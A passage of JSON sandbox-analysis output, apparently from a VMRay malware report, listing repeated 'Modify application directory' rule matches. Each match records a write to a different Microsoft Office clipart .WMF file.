office\\clipart\\pub60cor\\sy01253_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01462_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43881", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01462_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01491_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43888", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01491_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01563_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43895", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01563_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01572_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43902", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01572_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01590_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43909", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01590_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TAIL.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tail.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43916", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tail.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00011_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43923", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00011_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00014_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00014_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43934", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00014_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00018_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00018_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43941", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00018_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00095_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00095_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43948", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00095_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00211_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43955", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00211_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00217_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43962", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00217_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00218_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43969", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00218_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00231_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43976", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00231_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00234_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43983", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00234_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00241_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43990", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00241_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00246_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00246_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43997", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00246_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00253_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00253_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44004", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00253_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00255_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44011", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00255_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00330_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44018", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00330_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00411_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00411_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44025", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00411_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00687_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44032", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00687_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01164_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44039", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01164_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01165_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01165_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01165_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01308_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44053", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01308_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00006_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44062", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00006_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00095_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00095_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44069", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00095_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00097_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00097_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44076", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00097_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00116_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00116_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44083", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00116_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00126_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00126_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44090", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00126_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00172_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00172_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44097", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00172_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00178_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44104", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00178_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00232_.wmf", "operations": [ "write" ], "type": "file_artifact", 